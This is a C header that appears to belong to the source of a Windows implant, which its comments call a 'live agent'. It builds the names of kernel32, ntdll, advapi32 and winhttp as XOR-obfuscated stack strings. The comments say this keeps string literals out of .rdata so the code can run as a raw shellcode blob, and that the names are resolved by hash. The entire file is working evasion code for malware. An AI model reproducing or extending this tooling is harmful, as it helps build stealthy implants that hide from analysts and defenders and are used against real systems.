/* stackstrings.h - module names built on the stack, no .rdata literals.
 *
 * Why: every string literal the compiler emits lands in .rdata; when
 * .text is later extracted as a raw blob, RIP-relative addresses into
 * .rdata point past the end of the blob and the first read faults
 * (proven live by .local-tests/blob_loader.c).
 *
 * Form (notes/STRINGS.md par.4): each element of the name is stored as
 * an ENCODED immediate (plain ^ key) and DECODED inside the write -
 * buf[i] = (ENC ^ key). Two rules make it work:
 *   - the key is a VOLATILE local: a macro/plain constant would let the
 *     compiler fold ENC^key back into a plaintext immediate, defeating
 *     the XOR entirely;
 *   - one pass, no separate xor loop over the buffer (a separate loop
 *     vectorizes at -O2 and the SSE key splat goes back to .rdata).
 *
 * Generated by a script (lengths and encodings are machine-computed);
 * the oracle .local-tests/hash_resolve_oracle.c verifies every builder
 * against the real name at runtime - a wrong byte resolves NULL and the
 * oracle fails loud. 2026-08-29 lesson: the first hand-written version
 * stored ciphertext without decoding and the live agent died with
 * "Failed to resolve the WinHTTP table".
 */

#pragma once
#include "types.h"
#include "wintypes.h"   /* UNICODE_STRING */

#define STACKSTR_KEY_KERNEL32 0x5A

#define STACKSTR_KEY_NTDLL 0x3C

#define STACKSTR_KEY_ADVAPI32 0xA7

#define STACKSTR_KEY_WINHTTP 0x71


/* L"kernel32.dll" - 12 chars + NUL. */
static VOID StrKernel32(PWCHAR buf)
{
    volatile UINT32 key = STACKSTR_KEY_KERNEL32;
    buf[0] = (WCHAR)(0x31u ^ key); /* 'k' */
    buf[1] = (WCHAR)(0x3Fu ^ key); /* 'e' */
    buf[2] = (WCHAR)(0x28u ^ key); /* 'r' */
    buf[3] = (WCHAR)(0x34u ^ key); /* 'n' */
    buf[4] = (WCHAR)(0x3Fu ^ key); /* 'e' */
    buf[5] = (WCHAR)(0x36u ^ key); /* 'l' */
    buf[6] = (WCHAR)(0x69u ^ key); /* '3' */
    buf[7] = (WCHAR)(0x68u ^ key); /* '2' */
    buf[8] = (WCHAR)(0x74u ^ key); /* '.' */
    buf[9] = (WCHAR)(0x3Eu ^ key); /* 'd' */
    buf[10] = (WCHAR)(0x36u ^ key); /* 'l' */
    buf[11] = (WCHAR)(0x36u ^ key); /* 'l' */
    buf[12] = 0;
}

#define STRLEN_BYTES_KERNEL32 24   /* 12 chars * 2 */

/* L"ntdll.dll" - 9 chars + NUL. */
static VOID StrNtdll(PWCHAR buf)
{
    volatile UINT32 key = STACKSTR_KEY_NTDLL;
    buf[0] = (WCHAR)(0x52u ^ key); /* 'n' */
    buf[1] = (WCHAR)(0x48u ^ key); /* 't' */
    buf[2] = (WCHAR)(0x58u ^ key); /* 'd' */
    buf[3] = (WCHAR)(0x50u ^ key); /* 'l' */
    buf[4] = (WCHAR)(0x50u ^ key); /* 'l' */
    buf[5] = (WCHAR)(0x12u ^ key); /* '.' */
    buf[6] = (WCHAR)(0x58u ^ key); /* 'd' */
    buf[7] = (WCHAR)(0x50u ^ key); /* 'l' */
    buf[8] = (WCHAR)(0x50u ^ key); /* 'l' */
    buf[9] = 0;
}

#define STRLEN_BYTES_NTDLL 18   /* 9 chars * 2 */

/* L"advapi32.dll" - 12 chars + NUL. */
static VOID StrAdvapi32(PWCHAR buf)
{
    volatile UINT32 key = STACKSTR_KEY_ADVAPI32;
    buf[0] = (WCHAR)(0xC6u ^ key); /* 'a' */
    buf[1] = (WCHAR)(0xC3u ^ key); /* 'd' */
    buf[2] = (WCHAR)(0xD1u ^ key); /* 'v' */
    buf[3] = (WCHAR)(0xC6u ^ key); /* 'a' */
    buf[4] = (WCHAR)(0xD7u ^ key); /* 'p' */
    buf[5] = (WCHAR)(0xCEu ^ key); /* 'i' */
    buf[6] = (WCHAR)(0x94u ^ key); /* '3' */
    buf[7] = (WCHAR)(0x95u ^ key); /* '2' */
    buf[8] = (WCHAR)(0x89u ^ key); /* '.' */
    buf[9] = (WCHAR)(0xC3u ^ key); /* 'd' */
    buf[10] = (WCHAR)(0xCBu ^ key); /* 'l' */
    buf[11] = (WCHAR)(0xCBu ^ key); /* 'l' */
    buf[12] = 0;
}

#define STRLEN_BYTES_ADVAPI32 24   /* 12 chars * 2 */

/* L"winhttp.dll" - 11 chars + NUL. */
static VOID StrWinhttp(PWCHAR buf)
{
    volatile UINT32 key = STACKSTR_KEY_WINHTTP;
    buf[0] = (WCHAR)(0x06u ^ key); /* 'w' */
    buf[1] = (WCHAR)(0x18u ^ key); /* 'i' */
    buf[2] = (WCHAR)(0x1Fu ^ key); /* 'n' */
    buf[3] = (WCHAR)(0x19u ^ key); /* 'h' */
    buf[4] = (WCHAR)(0x05u ^ key); /* 't' */
    buf[5] = (WCHAR)(0x05u ^ key); /* 't' */
    buf[6] = (WCHAR)(0x01u ^ key); /* 'p' */
    buf[7] = (WCHAR)(0x5Fu ^ key); /* '.' */
    buf[8] = (WCHAR)(0x15u ^ key); /* 'd' */
    buf[9] = (WCHAR)(0x1Du ^ key); /* 'l' */
    buf[10] = (WCHAR)(0x1Du ^ key); /* 'l' */
    buf[11] = 0;
}

#define STRLEN_BYTES_WINHTTP 22   /* 11 chars * 2 */
